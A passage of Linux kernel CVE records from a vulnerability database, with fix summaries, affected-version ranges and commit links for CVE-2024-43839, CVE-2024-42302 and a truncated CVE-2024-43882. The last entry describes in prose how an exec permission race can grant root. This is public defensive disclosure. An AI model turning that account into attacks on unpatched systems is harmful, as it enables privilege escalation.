          "url": "https://git.kernel.org/stable/c/66951d98d9bf45ba25acf37fe0747253fafdf298"
        }
      ],
      "title": "drm/amd/display: Add NULL test for \u0027timing generator\u0027 in \u0027dcn21_set_pipe()\u0027",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26661",
    "datePublished": "2024-04-02T06:22:10.989Z",
    "dateReserved": "2024-02-19T14:20:24.148Z",
    "dateUpdated": "2025-05-04T08:53:21.527Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-43839 (GCVE-0-2024-43839)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:21 – Updated: 2025-11-03 22:05

Title

bna: adjust 'name' buf size of bna_tcb and bna_ccb structures

Summary

In the Linux kernel, the following vulnerability has been resolved: bna: adjust 'name' buf size of bna_tcb and bna_ccb structures To have enough space to write all possible sprintf() args. Currently 'name' size is 16, but the first '%s' specifier may already need at least 16 characters, since 'bnad->netdev->name' is used there. For '%d' specifiers, assume that they require: * 1 char for 'tx_id + tx_info->tcb[i]->id' sum, BNAD_MAX_TXQ_PER_TX is 8 * 2 chars for 'rx_id + rx_info->rx_ctrl[i].ccb->id', BNAD_MAX_RXP_PER_RX is 16 And replace sprintf with snprintf. Detected using the static analysis tool - Svace.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f121740f69eda4da2…
	https://git.kernel.org/stable/c/c90b1cd7758fd4839…
	https://git.kernel.org/stable/c/6ce46045f9b90d952…
	https://git.kernel.org/stable/c/6d20c4044ab4d0e6a…
	https://git.kernel.org/stable/c/ab748dd10d8742561…
	https://git.kernel.org/stable/c/b0ff0cd0847b03c0a…
	https://git.kernel.org/stable/c/e0f48f51d55fb1874…
	https://git.kernel.org/stable/c/c9741a03dc8e491e5…

Impacted products

Vendor

Product

Version

Linux

Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < f121740f69eda4da2de9a20a6687a13593e72540 (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < c90b1cd7758fd4839909e838ae195d19f8065d76 (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < 6ce46045f9b90d952602e2c0b8886cfadf860bf1 (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < 6d20c4044ab4d0e6a99aa35853e66f0aed5589e3 (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < ab748dd10d8742561f2980fea08ffb4f0cacfdef (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < b0ff0cd0847b03c0a0abe20cfa900eabcfcb9e43 (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < e0f48f51d55fb187400e9787192eda09fa200ff5 (git)
Affected: 8b230ed8ec96c933047dd0625cf95f739e4939a6 , < c9741a03dc8e491e57b95fba0058ab46b7e506da (git)

Linux

Affected: 2.6.37
Unaffected: 0 , < 2.6.37 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43839",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:08:02.344125Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:22.797Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:05:32.856Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/brocade/bna/bna_types.h",
            "drivers/net/ethernet/brocade/bna/bnad.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f121740f69eda4da2de9a20a6687a13593e72540",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "c90b1cd7758fd4839909e838ae195d19f8065d76",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "6ce46045f9b90d952602e2c0b8886cfadf860bf1",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "6d20c4044ab4d0e6a99aa35853e66f0aed5589e3",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "ab748dd10d8742561f2980fea08ffb4f0cacfdef",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "b0ff0cd0847b03c0a0abe20cfa900eabcfcb9e43",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "e0f48f51d55fb187400e9787192eda09fa200ff5",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            },
            {
              "lessThan": "c9741a03dc8e491e57b95fba0058ab46b7e506da",
              "status": "affected",
              "version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/brocade/bna/bna_types.h",
            "drivers/net/ethernet/brocade/bna/bnad.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.37"
            },
            {
              "lessThan": "2.6.37",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.37",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbna: adjust \u0027name\u0027 buf size of bna_tcb and bna_ccb structures\n\nTo have enough space to write all possible sprintf() args. Currently\n\u0027name\u0027 size is 16, but the first \u0027%s\u0027 specifier may already need at\nleast 16 characters, since \u0027bnad-\u003enetdev-\u003ename\u0027 is used there.\n\nFor \u0027%d\u0027 specifiers, assume that they require:\n * 1 char for \u0027tx_id + tx_info-\u003etcb[i]-\u003eid\u0027 sum, BNAD_MAX_TXQ_PER_TX is 8\n * 2 chars for \u0027rx_id + rx_info-\u003erx_ctrl[i].ccb-\u003eid\u0027, BNAD_MAX_RXP_PER_RX\n   is 16\n\nAnd replace sprintf with snprintf.\n\nDetected using the static analysis tool - Svace."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:27:24.820Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f121740f69eda4da2de9a20a6687a13593e72540"
        },
        {
          "url": "https://git.kernel.org/stable/c/c90b1cd7758fd4839909e838ae195d19f8065d76"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ce46045f9b90d952602e2c0b8886cfadf860bf1"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d20c4044ab4d0e6a99aa35853e66f0aed5589e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab748dd10d8742561f2980fea08ffb4f0cacfdef"
        },
        {
          "url": "https://git.kernel.org/stable/c/b0ff0cd0847b03c0a0abe20cfa900eabcfcb9e43"
        },
        {
          "url": "https://git.kernel.org/stable/c/e0f48f51d55fb187400e9787192eda09fa200ff5"
        },
        {
          "url": "https://git.kernel.org/stable/c/c9741a03dc8e491e57b95fba0058ab46b7e506da"
        }
      ],
      "title": "bna: adjust \u0027name\u0027 buf size of bna_tcb and bna_ccb structures",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43839",
    "datePublished": "2024-08-17T09:21:55.085Z",
    "dateReserved": "2024-08-17T09:11:59.274Z",
    "dateUpdated": "2025-11-03T22:05:32.856Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42302 (GCVE-0-2024-42302)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2025-11-03 22:04

Title

PCI/DPC: Fix use-after-free on concurrent DPC and hot-removal

Summary

In the Linux kernel, the following vulnerability has been resolved: PCI/DPC: Fix use-after-free on concurrent DPC and hot-removal Keith reports a use-after-free when a DPC event occurs concurrently to hot-removal of the same portion of the hierarchy: The dpc_handler() awaits readiness of the secondary bus below the Downstream Port where the DPC event occurred. To do so, it polls the config space of the first child device on the secondary bus. If that child device is concurrently removed, accesses to its struct pci_dev cause the kernel to oops. That's because pci_bridge_wait_for_secondary_bus() neglects to hold a reference on the child device. Before v6.3, the function was only called on resume from system sleep or on runtime resume. Holding a reference wasn't necessary back then because the pciehp IRQ thread could never run concurrently. (On resume from system sleep, IRQs are not enabled until after the resume_noirq phase. And runtime resume is always awaited before a PCI device is removed.) However starting with v6.3, pci_bridge_wait_for_secondary_bus() is also called on a DPC event. Commit 53b54ad074de ("PCI/DPC: Await readiness of secondary bus after reset"), which introduced that, failed to appreciate that pci_bridge_wait_for_secondary_bus() now needs to hold a reference on the child device because dpc_handler() and pciehp may indeed run concurrently. The commit was backported to v5.10+ stable kernels, so that's the oldest one affected. Add the missing reference acquisition. Abridged stack trace: BUG: unable to handle page fault for address: 00000000091400c0 CPU: 15 PID: 2464 Comm: irq/53-pcie-dpc 6.9.0 RIP: pci_bus_read_config_dword+0x17/0x50 pci_dev_wait() pci_bridge_wait_for_secondary_bus() dpc_reset_link() pcie_do_recovery() dpc_handler()

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c52f9e1a9eb40f139…
	https://git.kernel.org/stable/c/2c111413f38ca5cf8…
	https://git.kernel.org/stable/c/f63df70b439bb8331…
	https://git.kernel.org/stable/c/2cc8973bdc4d6c928…
	https://git.kernel.org/stable/c/b16f3ea1db47a6766…
	https://git.kernel.org/stable/c/11a1f4bc47362700f…

Impacted products

Vendor

Product

Version

Linux

Affected: d0292124bb5787a2f1ab1316509e801ca89c10fb , < c52f9e1a9eb40f13993142c331a6cfd334d4b91d (git)
Affected: ffe2318405e605f1b3985ce188eff69e6d1d1baa , < 2c111413f38ca5cf87557cab89f6d82b0e3433e7 (git)
Affected: 189f856e76f5463f59efb5fc18dcc1692d04c41a , < f63df70b439bb8331358a306541893bf415bf1da (git)
Affected: 53b54ad074de1896f8b021615f65b27f557ce874 , < 2cc8973bdc4d6c928ebe38b88090a2cdfe81f42f (git)
Affected: 53b54ad074de1896f8b021615f65b27f557ce874 , < b16f3ea1db47a6766a9f1169244cf1fc287a7c62 (git)
Affected: 53b54ad074de1896f8b021615f65b27f557ce874 , < 11a1f4bc47362700fcbde717292158873fb847ed (git)
Affected: 0081032082b5b45ca902b3c3d6986cb5cca69ff2 (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42302",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:10:28.656566Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:28.331Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:04:06.070Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/pci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c52f9e1a9eb40f13993142c331a6cfd334d4b91d",
              "status": "affected",
              "version": "d0292124bb5787a2f1ab1316509e801ca89c10fb",
              "versionType": "git"
            },
            {
              "lessThan": "2c111413f38ca5cf87557cab89f6d82b0e3433e7",
              "status": "affected",
              "version": "ffe2318405e605f1b3985ce188eff69e6d1d1baa",
              "versionType": "git"
            },
            {
              "lessThan": "f63df70b439bb8331358a306541893bf415bf1da",
              "status": "affected",
              "version": "189f856e76f5463f59efb5fc18dcc1692d04c41a",
              "versionType": "git"
            },
            {
              "lessThan": "2cc8973bdc4d6c928ebe38b88090a2cdfe81f42f",
              "status": "affected",
              "version": "53b54ad074de1896f8b021615f65b27f557ce874",
              "versionType": "git"
            },
            {
              "lessThan": "b16f3ea1db47a6766a9f1169244cf1fc287a7c62",
              "status": "affected",
              "version": "53b54ad074de1896f8b021615f65b27f557ce874",
              "versionType": "git"
            },
            {
              "lessThan": "11a1f4bc47362700fcbde717292158873fb847ed",
              "status": "affected",
              "version": "53b54ad074de1896f8b021615f65b27f557ce874",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "0081032082b5b45ca902b3c3d6986cb5cca69ff2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/pci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.10.176",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.15.104",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "6.1.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.2.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/DPC: Fix use-after-free on concurrent DPC and hot-removal\n\nKeith reports a use-after-free when a DPC event occurs concurrently to\nhot-removal of the same portion of the hierarchy:\n\nThe dpc_handler() awaits readiness of the secondary bus below the\nDownstream Port where the DPC event occurred.  To do so, it polls the\nconfig space of the first child device on the secondary bus.  If that\nchild device is concurrently removed, accesses to its struct pci_dev\ncause the kernel to oops.\n\nThat\u0027s because pci_bridge_wait_for_secondary_bus() neglects to hold a\nreference on the child device.  Before v6.3, the function was only\ncalled on resume from system sleep or on runtime resume.  Holding a\nreference wasn\u0027t necessary back then because the pciehp IRQ thread\ncould never run concurrently.  (On resume from system sleep, IRQs are\nnot enabled until after the resume_noirq phase.  And runtime resume is\nalways awaited before a PCI device is removed.)\n\nHowever starting with v6.3, pci_bridge_wait_for_secondary_bus() is also\ncalled on a DPC event.  Commit 53b54ad074de (\"PCI/DPC: Await readiness\nof secondary bus after reset\"), which introduced that, failed to\nappreciate that pci_bridge_wait_for_secondary_bus() now needs to hold a\nreference on the child device because dpc_handler() and pciehp may\nindeed run concurrently.  The commit was backported to v5.10+ stable\nkernels, so that\u0027s the oldest one affected.\n\nAdd the missing reference acquisition.\n\nAbridged stack trace:\n\n  BUG: unable to handle page fault for address: 00000000091400c0\n  CPU: 15 PID: 2464 Comm: irq/53-pcie-dpc 6.9.0\n  RIP: pci_bus_read_config_dword+0x17/0x50\n  pci_dev_wait()\n  pci_bridge_wait_for_secondary_bus()\n  dpc_reset_link()\n  pcie_do_recovery()\n  dpc_handler()"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:58.649Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c52f9e1a9eb40f13993142c331a6cfd334d4b91d"
        },
        {
          "url": "https://git.kernel.org/stable/c/2c111413f38ca5cf87557cab89f6d82b0e3433e7"
        },
        {
          "url": "https://git.kernel.org/stable/c/f63df70b439bb8331358a306541893bf415bf1da"
        },
        {
          "url": "https://git.kernel.org/stable/c/2cc8973bdc4d6c928ebe38b88090a2cdfe81f42f"
        },
        {
          "url": "https://git.kernel.org/stable/c/b16f3ea1db47a6766a9f1169244cf1fc287a7c62"
        },
        {
          "url": "https://git.kernel.org/stable/c/11a1f4bc47362700fcbde717292158873fb847ed"
        }
      ],
      "title": "PCI/DPC: Fix use-after-free on concurrent DPC and hot-removal",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42302",
    "datePublished": "2024-08-17T09:09:08.891Z",
    "dateReserved": "2024-07-30T07:40:12.272Z",
    "dateUpdated": "2025-11-03T22:04:06.070Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43882 (GCVE-0-2024-43882)

Vulnerability from cvelistv5 – Published: 2024-08-21 00:10 – Updated: 2026-01-05 10:52

Title

exec: Fix ToCToU between perm check and set-uid/gid usage

Summary

In the Linux kernel, the following vulnerability has been resolved: exec: Fix ToCToU between perm check and set-uid/gid usage When opening a file for exec via do_filp_open(), permission checking is done against the file's metadata at that moment, and on success, a file pointer is passed back. Much later in the execve() code path, the file metadata (specifically mode, uid, and gid) is used to determine if/how to set the uid and gid. However, those values may have changed since the permissions check, meaning the execution may gain unintended privileges. For example, if a file could change permissions from executable and not set-id: ---------x 1 root root 16048 Aug 7 13:16 target to set-id and non-executable: ---S------ 1 root root 16048 Aug 7 13:16 target it is possible to gain root privileges when execution should have been disallowed. While this race condition is rare in real-world scenarios, it has been observed (and proven exploitable) when package managers are updating the setuid bits of installed programs. Such files start with being world-executable but then are adjusted to be group-exec with a set-uid bit. For example, "chmod o-x,u+s target" makes "target" executable only by uid "root" and gid "cdrom", while also becoming setuid-root: -rwxr-xr-x 1 root cdrom 16048 Aug 7 13:16 target becomes: -rwsr-xr-- 1 root cdrom 16048 Aug 7 13:16 target But racing the chmod means users without group "cdrom" membership can get the permission to execute "target" just before the chmod, and when the chmod finishes, the exec reaches brpm_fill_uid(), and performs the setuid to root, violating the expressed authorization of "only cdrom group members can setuid to root". Re-check that we still have execute permissions in case the metadata has changed. It would be better to keep a copy from the perm-check time, but until we can do that refactoring, the least-bad option is to do a full inode_permission() call (under inode lock). It is understood that this is safe against dead-locks, but hardly optimal.

Severity ?

8.4 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d5c3c7e26275a2d83…
	https://git.kernel.org/stable/c/368f6985d46657b8b…
	https://git.kernel.org/stable/c/15469d46ba34559bf…
	https://git.kernel.org/stable/c/9b424c5d4130d5631…
	https://git.kernel.org/stable/c/f6cfc6bcfd5e1cf76…
	https://git.kernel.org/stable/c/d2a2a4714d80d09b0…
	https://git.kernel.org/stable/c/90dfbba89ad4f0d9c…
	https://git.kernel.org/stable/c/f50733b45d865f91d…

Impacted products

Vendor

Product

Version

Linux

Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < d5c3c7e26275a2d83b894d30f7582a42853a958f (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < 368f6985d46657b8b466a421dddcacd4051f7ada (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < 15469d46ba34559bfe7e3de6659115778c624759 (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < 9b424c5d4130d56312e2a3be17efb0928fec4d64 (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < f6cfc6bcfd5e1cf76115b6450516ea4c99897ae1 (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < d2a2a4714d80d09b0f8eb6438ab4224690b7121e (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < 90dfbba89ad4f0d9c9744ecbb1adac4aa2ff4f3e (git)
Affected: 9167b0b9a0ab7907191523f5a0528e3b9c288e21 , < f50733b45d865f91db90919f8311e2127ce5a0cb (git)

Linux

Affected: 2.6.18
Unaffected: 0 , < 2.6.18 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.106 , ≤ 6.1.* (semver)
Unaffected: 6.6.47 , ≤ 6.6.* (semver)
Unaffected: 6.10.6 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 8.4,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-43882",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-12-10T04:55:56.573367Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-367",
                "description": "CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-12-10T18:58:31.805Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:06:36.516Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/exec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
